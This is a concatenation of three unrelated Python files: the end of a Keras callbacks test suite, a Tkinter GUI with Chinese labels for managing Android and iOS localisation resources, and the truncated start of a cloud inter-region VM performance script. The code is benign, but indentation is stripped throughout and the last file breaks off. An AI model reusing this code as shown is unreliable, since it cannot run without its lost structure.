model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer=keras.optimizers.SGD(lr=0.1),
metrics=['accuracy'])
return model
# case 1, create new file with defined separator
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
with open(filepath) as csvfile:
dialect = csv.Sniffer().sniff(csvfile.read())
assert dialect.delimiter == sep
del model
del cbks
# case 2, append data to existing file, skip header
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep, append=True)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# case 3, reuse of CSVLogger object
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
with open(filepath) as csvfile:
output = ' '.join(csvfile.readlines())
assert len(re.findall('epoch', output)) == 1
os.remove(filepath)
def test_stop_training_csv(self):
# Test that using the CSVLogger callback with the TerminateOnNaN callback
# does not result in invalid CSVs.
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
with self.test_session():
fp = os.path.join(tmpdir, 'test.csv')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN(), keras.callbacks.CSVLogger(fp)]
model = keras.models.Sequential()
for _ in range(5):
model.add(keras.layers.Dense(2, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='linear'))
model.compile(loss='mean_squared_error',
optimizer='rmsprop')
def data_generator():
i = 0
max_batch_index = len(x_train) // BATCH_SIZE
tot = 0
while 1:
if tot > 3 * len(x_train):
yield (np.ones([BATCH_SIZE, INPUT_DIM]) * np.nan,
np.ones([BATCH_SIZE, NUM_CLASSES]) * np.nan)
else:
yield (x_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE],
y_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE])
i += 1
tot += 1
i %= max_batch_index
history = model.fit_generator(data_generator(),
len(x_train) // BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
assert len(loss) > 1
assert loss[-1] == np.inf or np.isnan(loss[-1])
values = []
with open(fp) as f:
for x in csv.reader(f):
# In windows, due to \r\n line ends we may end up reading empty lines
# after each line. Skip empty lines.
if x:
values.append(x)
assert 'nan' in values[-1], 'The last epoch was not logged.'
def test_TerminateOnNaN(self):
with self.test_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN()]
model = keras.models.Sequential()
initializer = keras.initializers.Constant(value=1e5)
for _ in range(5):
model.add(
keras.layers.Dense(
2,
input_dim=INPUT_DIM,
activation='relu',
kernel_initializer=initializer))
model.add(keras.layers.Dense(NUM_CLASSES))
model.compile(loss='mean_squared_error', optimizer='rmsprop')
history = model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
assert len(loss) == 1
assert loss[0] == np.inf
def test_TensorBoard(self):
np.random.seed(1337)
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def data_generator(train):
if train:
max_batch_index = len(x_train) // BATCH_SIZE
else:
max_batch_index = len(x_test) // BATCH_SIZE
i = 0
while 1:
if train:
yield (x_train[i * BATCH_SIZE:(i + 1) * BATCH_SIZE],
y_train[i * BATCH_SIZE:(i + 1) * BATCH_SIZE])
else:
yield (x_test[i * BATCH_SIZE:(i + 1) * BATCH_SIZE],
y_test[i * BATCH_SIZE:(i + 1) * BATCH_SIZE])
i += 1
i %= max_batch_index
# case: Sequential
with self.test_session():
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
# non_trainable_weights: moving_variance, moving_mean
model.add(keras.layers.BatchNormalization())
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
tsb = keras.callbacks.TensorBoard(
log_dir=temp_dir, histogram_freq=1, write_images=True,
write_grads=True, batch_size=5)
cbks = [tsb]
# fit with validation data
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=3,
verbose=0)
# fit with validation data and accuracy
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
# fit generator with validation data
model.fit_generator(
data_generator(True),
len(x_train),
epochs=2,
validation_data=(x_test, y_test),
callbacks=cbks,
verbose=0)
# fit generator without validation data
model.fit_generator(
data_generator(True),
len(x_train),
epochs=2,
callbacks=cbks,
verbose=0)
# fit generator with validation data and accuracy
model.fit_generator(
data_generator(True),
len(x_train),
epochs=2,
validation_data=(x_test, y_test),
callbacks=cbks,
verbose=0)
# fit generator without validation data and accuracy
model.fit_generator(
data_generator(True), len(x_train), epochs=2, callbacks=cbks)
assert os.path.exists(temp_dir)
def test_TensorBoard_histogram_freq_must_have_validation_data(self):
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
with self.test_session():
filepath = os.path.join(tmpdir, 'logs')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def data_generator(train):
if train:
max_batch_index = len(x_train) // BATCH_SIZE
else:
max_batch_index = len(x_test) // BATCH_SIZE
i = 0
while 1:
if train:
# simulate multi-input/output models
yield (x_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE],
y_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE])
else:
yield (x_test[i * BATCH_SIZE: (i + 1) * BATCH_SIZE],
y_test[i * BATCH_SIZE: (i + 1) * BATCH_SIZE])
i += 1
i %= max_batch_index
inp = keras.Input((INPUT_DIM,))
hidden = keras.layers.Dense(2, activation='relu')(inp)
hidden = keras.layers.Dropout(0.1)(hidden)
output = keras.layers.Dense(NUM_CLASSES, activation='softmax')(hidden)
model = keras.models.Model(inputs=inp, outputs=output)
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# we must generate new callbacks for each test, as they aren't stateless
def callbacks_factory(histogram_freq):
return [keras.callbacks.TensorBoard(
log_dir=filepath,
histogram_freq=histogram_freq,
write_images=True, write_grads=True,
batch_size=5)]
# fit w/o validation data should raise ValueError if histogram_freq > 0
cbs = callbacks_factory(histogram_freq=1)
with self.assertRaises(ValueError):
model.fit(
x_train, y_train, batch_size=BATCH_SIZE, callbacks=cbs, epochs=3)
for cb in cbs:
cb.on_train_end()
# fit generator without validation data should raise ValueError if
# histogram_freq > 0
cbs = callbacks_factory(histogram_freq=1)
with self.assertRaises(ValueError):
model.fit_generator(
data_generator(True), len(x_train), epochs=2, callbacks=cbs)
for cb in cbs:
cb.on_train_end()
# Make sure file writer cache is clear to avoid failures during cleanup.
writer_cache.FileWriterCache.clear()
def test_TensorBoard_multi_input_output(self):
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
with self.test_session():
filepath = os.path.join(tmpdir, 'logs')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def data_generator(train):
if train:
max_batch_index = len(x_train) // BATCH_SIZE
else:
max_batch_index = len(x_test) // BATCH_SIZE
i = 0
while 1:
if train:
# simulate multi-input/output models
yield ([x_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE]] * 2,
[y_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE]] * 2)
else:
yield ([x_test[i * BATCH_SIZE: (i + 1) * BATCH_SIZE]] * 2,
[y_test[i * BATCH_SIZE: (i + 1) * BATCH_SIZE]] * 2)
i += 1
i %= max_batch_index
inp1 = keras.Input((INPUT_DIM,))
inp2 = keras.Input((INPUT_DIM,))
inp = keras.layers.add([inp1, inp2])
hidden = keras.layers.Dense(2, activation='relu')(inp)
hidden = keras.layers.Dropout(0.1)(hidden)
output1 = keras.layers.Dense(NUM_CLASSES, activation='softmax')(hidden)
output2 = keras.layers.Dense(NUM_CLASSES, activation='softmax')(hidden)
model = keras.models.Model([inp1, inp2], [output1, output2])
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# we must generate new callbacks for each test, as they aren't stateless
def callbacks_factory(histogram_freq):
return [keras.callbacks.TensorBoard(log_dir=filepath,
histogram_freq=histogram_freq,
write_images=True, write_grads=True,
batch_size=5)]
# fit without validation data
model.fit([x_train] * 2, [y_train] * 2, batch_size=BATCH_SIZE,
callbacks=callbacks_factory(histogram_freq=0), epochs=3)
# fit with validation data and accuracy
model.fit([x_train] * 2, [y_train] * 2, batch_size=BATCH_SIZE,
validation_data=([x_test] * 2, [y_test] * 2),
callbacks=callbacks_factory(histogram_freq=1), epochs=2)
# fit generator without validation data
model.fit_generator(data_generator(True), len(x_train), epochs=2,
callbacks=callbacks_factory(histogram_freq=0))
# fit generator with validation data and accuracy
model.fit_generator(data_generator(True), len(x_train), epochs=2,
validation_data=([x_test] * 2, [y_test] * 2),
callbacks=callbacks_factory(histogram_freq=1))
assert os.path.isdir(filepath)
def test_Tensorboard_histogram_summaries_in_test_function(self):
class FileWriterStub(object):
def __init__(self, logdir, graph=None):
self.logdir = logdir
self.graph = graph
self.steps_seen = []
def add_summary(self, summary, global_step):
summary_obj = summary_pb2.Summary()
# ensure a valid Summary proto is being sent
if isinstance(summary, bytes):
summary_obj.ParseFromString(summary)
else:
assert isinstance(summary, summary_pb2.Summary)
summary_obj = summary
# keep track of steps seen for the merged_summary op,
# which contains the histogram summaries
if len(summary_obj.value) > 1:
self.steps_seen.append(global_step)
def flush(self):
pass
def close(self):
pass
def _init_writer(obj):
obj.writer = FileWriterStub(obj.log_dir)
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
with self.test_session():
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
# non_trainable_weights: moving_variance, moving_mean
model.add(keras.layers.BatchNormalization())
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
keras.callbacks.TensorBoard._init_writer = _init_writer
tsb = keras.callbacks.TensorBoard(
log_dir=tmpdir,
histogram_freq=1,
write_images=True,
write_grads=True,
batch_size=5)
cbks = [tsb]
# fit with validation data
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=3,
verbose=0)
self.assertAllEqual(tsb.writer.steps_seen, [0, 0.5, 1, 1.5, 2, 2.5])
def test_Tensorboard_histogram_summaries_with_generator(self):
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
def generator():
x = np.random.randn(10, 100).astype(np.float32)
y = np.random.randn(10, 10).astype(np.float32)
while True:
yield x, y
with self.test_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(10, input_dim=100, activation='relu'))
model.add(keras.layers.Dense(10, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
tsb = keras.callbacks.TensorBoard(
log_dir=tmpdir,
histogram_freq=1,
write_images=True,
write_grads=True,
batch_size=5)
cbks = [tsb]
# fit with validation generator
model.fit_generator(
generator(),
steps_per_epoch=2,
epochs=2,
validation_data=generator(),
validation_steps=2,
callbacks=cbks,
verbose=0)
with self.assertRaises(ValueError):
# fit with validation generator but no
# validation_steps
model.fit_generator(
generator(),
steps_per_epoch=2,
epochs=2,
validation_data=generator(),
callbacks=cbks,
verbose=0)
self.assertTrue(os.path.exists(tmpdir))
@unittest.skipIf(
os.name == 'nt',
'use_multiprocessing=True does not work on windows properly.')
def test_LambdaCallback(self):
with self.test_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# Start an arbitrary process that should run during model
# training and be terminated after training has completed.
e = threading.Event()
def target():
e.wait()
t = threading.Thread(target=target)
t.start()
cleanup_callback = keras.callbacks.LambdaCallback(
on_train_end=lambda logs: e.set())
cbks = [cleanup_callback]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
t.join()
assert not t.is_alive()
def test_TensorBoard_with_ReduceLROnPlateau(self):
with self.test_session():
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='binary_crossentropy', optimizer='sgd', metrics=['accuracy'])
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss', factor=0.5, patience=4, verbose=1),
keras.callbacks.TensorBoard(log_dir=temp_dir)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
assert os.path.exists(temp_dir)
def test_Tensorboard_batch_logging(self):
class FileWriterStub(object):
def __init__(self, logdir, graph=None):
self.logdir = logdir
self.graph = graph
self.batches_logged = []
self.summary_values = []
self.summary_tags = []
def add_summary(self, summary, step):
self.summary_values.append(summary.value[0].simple_value)
self.summary_tags.append(summary.value[0].tag)
self.batches_logged.append(step)
def flush(self):
pass
def close(self):
pass
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
tb_cbk = keras.callbacks.TensorBoard(temp_dir)
tb_cbk.writer = FileWriterStub(temp_dir)
for batch in range(5):
tb_cbk.on_batch_end(batch, {'acc': np.float32(batch)})
self.assertEqual(tb_cbk.writer.batches_logged, [0, 1, 2, 3, 4])
self.assertEqual(tb_cbk.writer.summary_values, [0., 1., 2., 3., 4.])
self.assertEqual(tb_cbk.writer.summary_tags, ['batch_acc'] * 5)
def test_Tensorboard_epoch_and_batch_logging(self):
class FileWriterStub(object):
def __init__(self, logdir, graph=None):
self.logdir = logdir
self.graph = graph
def add_summary(self, summary, step):
if 'batch_' in summary.value[0].tag:
self.batch_summary = (step, summary)
elif 'epoch_' in summary.value[0].tag:
self.epoch_summary = (step, summary)
def flush(self):
pass
def close(self):
pass
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
tb_cbk = keras.callbacks.TensorBoard(temp_dir)
tb_cbk.writer = FileWriterStub(temp_dir)
tb_cbk.on_batch_end(0, {'acc': np.float32(5.0)})
tb_cbk.on_epoch_end(0, {'acc': np.float32(10.0)})
batch_step, batch_summary = tb_cbk.writer.batch_summary
self.assertEqual(batch_step, 0)
self.assertEqual(batch_summary.value[0].simple_value, 5.0)
epoch_step, epoch_summary = tb_cbk.writer.epoch_summary
self.assertEqual(epoch_step, 0)
self.assertEqual(epoch_summary.value[0].simple_value, 10.0)
@test_util.run_in_graph_and_eager_modes
def test_Tensorboard_eager(self):
with self.test_session():
temp_dir = tempfile.mkdtemp(dir=self.get_temp_dir())
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='binary_crossentropy',
optimizer=adam.AdamOptimizer(0.01),
metrics=['accuracy'])
cbks = [keras.callbacks.TensorBoard(log_dir=temp_dir)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
self.assertTrue(os.path.exists(temp_dir))
def test_RemoteMonitorWithJsonPayload(self):
if requests is None:
self.skipTest('`requests` required to run this test')
with self.test_session():
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.np_utils.to_categorical(y_test)
y_train = keras.utils.np_utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [keras.callbacks.RemoteMonitor(send_as_json=True)]
with test.mock.patch.object(requests, 'post'):
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1)
if __name__ == '__main__':
test.main()
|
app_gui.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from tkinter import *
import logging
import os
import threading
from tkinter.filedialog import askdirectory
from tkinter.messagebox import askokcancel
from tkinter.filedialog import askopenfilename
from tkinter.messagebox import showinfo
from tkinter.messagebox import showwarning
from initializer import appConfig as appConfig
from repository import repository as repository
from initializer import Initializer
from importer import Importer as Importer
from generator import Generator as Generator
from translator import Translator as Translator
from translator import BaiduTranslator as BaiduTranslator
# 仓库初始化对话框
class RepoInitDialog(Frame):
# 初始化
def __init__(self, root):
self.root = root
self.android_resources_dir = StringVar()
self.ios_resources_dir = StringVar()
self.support_languages = {}
Frame.__init__(self, root)
# 多语言资源根目录选择
fileFrame = Frame(root)
fileFrame.pack()
Label(fileFrame, text=">> 初始化:项目多语言仓库初始化", justify=CENTER).grid(row=1, column=1)
Label(fileFrame, text="1. 选择 Android 多语言资源根目录:", justify=LEFT).grid(row=2, column=1)
Entry(fileFrame, textvariable=self.android_resources_dir).grid(row=2, column=2)
Button(fileFrame, text="选择", command=self.select_android_directory).grid(row=2, column=3)
Label(fileFrame, text="2. 选择 iOS 多语言资源根目录:", justify=LEFT).grid(row=3, column=1)
Entry(fileFrame, textvariable=self.ios_resources_dir).grid(row=3, column=2)
Button(fileFrame, text="选择", command=self.select_ios_directory).grid(row=3, column=3)
# 选择要支持的语言
languageFrame = Frame(root)
languageFrame.pack()
colCount = -1
for k,v in appConfig.languages.items():
colCount = colCount + 1
self.support_languages[k] = BooleanVar()
Checkbutton(languageFrame, text=k, variable=self.support_languages[k]).grid(row=2, column=colCount)
# 初始化按钮
startFrame = Frame(root)
startFrame.pack()
Button(startFrame, text="初始化", command=self.initialize_repo).grid(row=1, column=1)
# 选择 Android 多语言资源根目录
def select_android_directory(self):
self.android_resources_dir.set(askdirectory())
logging.debug(self.android_resources_dir)
# 选择 iOS 多语言资源根目录
def select_ios_directory(self):
self.ios_resources_dir.set(askdirectory())
logging.debug(self.ios_resources_dir)
# 初始化仓库
def initialize_repo(self):
# 初始化应用配置
support_languages = []
for k,v in self.support_languages.items():
if v.get():
for language in appConfig.languages[k]:
support_languages.append(language)
# 初始化项目仓库
init = Initializer()
init.initialize(self.android_resources_dir.get(), self.ios_resources_dir.get(), support_languages)
# 初始化完毕
result = askokcancel(title = '初始化完成', message='已完成项目仓库初始化,请重启程序')
if result:
self.root.quit()
# 主程序页面
class MainDialog(Frame):
# 初始化
def __init__(self, root):
self.importer = Importer(appConfig)
self.generator = Generator(appConfig)
self.translate_progress = StringVar()
self.translate_started = False
Frame.__init__(self, root)
frame = Frame(root)
frame.pack()
# 更新词条
# Label(frame, text="", justify=LEFT).grid(row=1, column=1)
Label(frame, text="1.更新词条", justify=LEFT).grid(row=2, column=1)
Button(frame, text="更新 Android 多语言词条", command=self.update_android_resource).grid(row=2, column=2)
Button(frame, text="更新 iOS 多语言词条", command=self.update_ios_resource).grid(row=2, column=3)
# 自助翻译
# Label(frame, text="", justify=LEFT).grid(row=3, column=1)
Label(frame, text="2.自助翻译", justify=LEFT).grid(row=4, column=1)
Button(frame, text="自动翻译", command=self.auto_translate).grid(row=4, column=2)
Label(frame, textvariable=self.translate_progress).grid(row=4, column=3)
# 导入翻译资源 导出翻译资源
# Label(frame, text="", justify=LEFT).grid(row=5, column=1)
Label(frame, text="3.人工翻译", justify=LEFT).grid(row=6, column=1)
Button(frame, text="导出翻译资源(Excel)", command=self.generate_translate_resources).grid(row=6, column=2)
Button(frame, text="导入翻译资源(Excel)", command=self.import_translated_excel).grid(row=6, column=3)
# 生成多语言资源
# Label(frame, text="", justify=LEFT).grid(row=7, column=1)
Label(frame, text="4.生成资源", justify=LEFT).grid(row=8, column=1)
Button(frame, text="生成 Android 多语言资源", command=self.generate_android_resources).grid(row=8, column=2)
Button(frame, text="生成 iOS 多语言资源", command=self.generate_ios_resources).grid(row=8, column=3)
# 校验多语言资源
# Label(frame, text="", justify=LEFT).grid(row=9, column=1)
Label(frame, text="5.校验资源", justify=LEFT).grid(row=10, column=1)
Button(frame, text="将 Android 多语言资源修改结果同步到仓库", command=self.import_modified_android_resource).grid(row=10, column=2)
Button(frame, text="将 iOS 多语言资源修改结果同步到仓库", command=self.import_modified_ios_resource).grid(row=10, column=3)
# 将 Android 多语言资源修改结果同步到仓库
def import_modified_android_resource(self):
# 如果没有设置过多语言根目录就设置下
if len(appConfig.android_resources_root_directory) == 0:
showinfo(title='提示', message='您在初始化项目的时候并没有为 Android 指定多语言根目录,无法完成更新。您可以尝试备份并删除 repo.json 文件重新初始化项目仓库。')
return
# 开始更新
self.importer.import_modified_android_resource()
showinfo(title='更新完成', message='已更新到多语言仓库!')
# 将 iOS 多语言资源修改结果同步到仓库
def import_modified_ios_resource(self):
# 如果没有设置过多语言根目录就设置下
if len(appConfig.ios_resources_root_directory) == 0:
showinfo(title='提示', message='您在初始化项目的时候并没有为 iOS 指定多语言根目录,无法完成更新。您可以尝试备份并删除 repo.json 文件重新初始化项目仓库。')
return
# 开始更新
self.importer.import_modified_ios_resource()
showinfo(title='更新完成', message='已更新到多语言仓库!')
# 生成 Android 多语言资源
def generate_android_resources(self):
# 判断没有翻译的词条数量
ret = repository.get_repo_state()
missed_cuount = ret["missed_count"]
if missed_cuount != 0:
result = askokcancel(title="警告", message="存在 %d 个词条没有完全翻译!仍然生成?" % missed_cuount)
if result:
self.__generate_android_resources_finaly()
else:
self.__generate_android_resources_finaly()
# 生成 iOS 多语言资源
def generate_ios_resources(self):
# 判断没有翻译的词条数量
ret = repository.get_repo_state()
missed_cuount = ret["missed_count"]
if missed_cuount != 0:
result = askokcancel(title="警告", message="存在 %d 个词条没有完全翻译!仍然生成?" % missed_cuount)
if result:
self.__generate_ios_resources_finaly()
else:
self.__generate_ios_resources_finaly()
# 生成用来翻译的 Excel 表格
def generate_translate_resources(self):
# 导出到的文件夹
appConfig.translate_excel_output_directory = askdirectory()
appConfig.write_to_json()
# 导出 Excel 文件
self.generator.gen_translate_excel(appConfig.translate_excel_output_directory)
showinfo(title='导出完成', message='已导出翻译 Excel 到 %s !' % appConfig.translate_excel_output_directory)
# 导入翻译资源
def import_translated_excel(self):
f = askopenfilename(title='选择 Excel 文件', filetypes=[('Excel', '*.xlsx'), ('All Files', '*')])
self.importer.import_translated_excel(f)
showinfo(title='更新完成', message='已更新到多语言仓库!')
# 更新 Android 多语言
def update_android_resource(self):
# 如果没有设置过多语言根目录就设置下
if len(appConfig.android_resources_root_directory) == 0:
showinfo(title='提示', message='您在初始化项目的时候并没有为 Android 指定多语言根目录,无法完成更新。您可以尝试备份并删除 repo.json 文件重新初始化项目仓库。')
return
# 开始更新
self.importer.update_android_resource()
showinfo(title='更新完成', message='已更新到多语言仓库!')
# 更新 iOS 多语言
def update_ios_resource(self):
# 如果没有设置过多语言根目录就设置下
if len(appConfig.ios_resources_root_directory) == 0:
showinfo(title='提示', message='您在初始化项目的时候并没有为 iOS 指定多语言根目录,无法完成更新。您可以尝试备份并删除 repo.json 文件重新初始化项目仓库。')
return
# 开始更新
self.importer.update_ios_resource()
showinfo(title='更新完成', message='已更新到多语言仓库!')
# 自动进行多语言翻译
def auto_translate(self):
bd = BaiduTranslator()
if not bd.is_configed():
showinfo(title='百度 API 没有配置', message='请在 config/baidu.json 文件中填写您在平台申请的 appid 和 appsecret 之后再尝试!')
return
ret = repository.get_repo_state()
missed_cuount = ret["missed_count"]
if self.translate_started:
showinfo(title='翻译已启动', message='翻译已经启动,程序正在翻译中……')
return
if missed_cuount == 0:
showinfo(title='已全部翻译完成', message='所有词条已经翻译完毕,无需进行自动翻译')
else:
thread = threading.Thread(target=self.__start_translate)
thread.start()
self.translate_started = True
# 正在开始执行翻译
def __start_translate(self):
translator = Translator()
translator.start_translate(self.on_translation_progress_changed, self.on_translation_finished)
# 通知翻译进度变化
def on_translation_progress_changed(self, progress):
logging.debug("On translation progress changed " + str(progress))
self.translate_progress.set("当前进度: %d%%" % progress)
# 增加一个完成的回调
def on_translation_finished(self):
self.translate_started = False
showinfo(title='翻译完成', message='已完成翻译任务')
# 生成 iOS 资源目录
def __generate_ios_resources_finaly(self):
# 如果没设置 iOS 资源目录,则需要选择下
if len(appConfig.ios_resources_root_directory) == 0:
showinfo(title='提示', message='请先选择 iOS 多语言资源根目录')
appConfig.ios_resources_root_directory = askdirectory()
appConfig.write_to_json()
# 生成
self.generator.gen_ios_resources()
showinfo(title='导出完成', message='已导出 iOS 多语言文件到 ' + appConfig.ios_resources_root_directory)
# 生成 Android 资源目录
def __generate_android_resources_finaly(self):
# 如果没设置 Android 资源目录,则需要选择下
if len(appConfig.android_resources_root_directory) == 0:
showinfo(title='提示', message='请先选择 Android 多语言资源根目录')
appConfig.android_resources_root_directory = askdirectory()
appConfig.write_to_json()
# 生成
self.generator.gen_android_resources()
showinfo(title='导出完成', message='已导出 Android 多语言文件到 ' + appConfig.android_resources_root_directory)
|
performance_test.py
|
import datetime
import itertools
import json
import logging
import os
import random
import shutil
import string
import sys
import threading
from typing import List, Dict, Tuple
from history.attempted import remove_already_attempted, write_attempted_tests
from cloud.clouds import Cloud, CloudRegion, interregion_distance
from history.results import combine_results_to_jsonl, untested_regionpairs, jsonl_to_csv
from util.subprocesses import run_subprocess
from util.utils import dedup
logging.basicConfig(
level=logging.DEBUG,
format="%(asctime)s %(levelname)s %(message)s",
datefmt="%H:%M:%S",
)
def __env_for_singlecloud_subprocess(run_id, cloud_region):
return {
"PATH": os.environ["PATH"],
"REGION": cloud_region.region_id,
"RUN_ID": run_id,
} | cloud_region.env()
def __create_vms(
regions: List[CloudRegion], run_id: str
) -> List[Tuple[CloudRegion, Dict]]:
# TODO Improve thread use with ThreadPoolExecutor and futures
def create_vm(
run_id_: str,
cloud_region_: CloudRegion,
vm_region_and_address_infos_inout: List[Tuple[CloudRegion, Dict]],
):
logging.info("Will launch a VM in %s", cloud_region_)
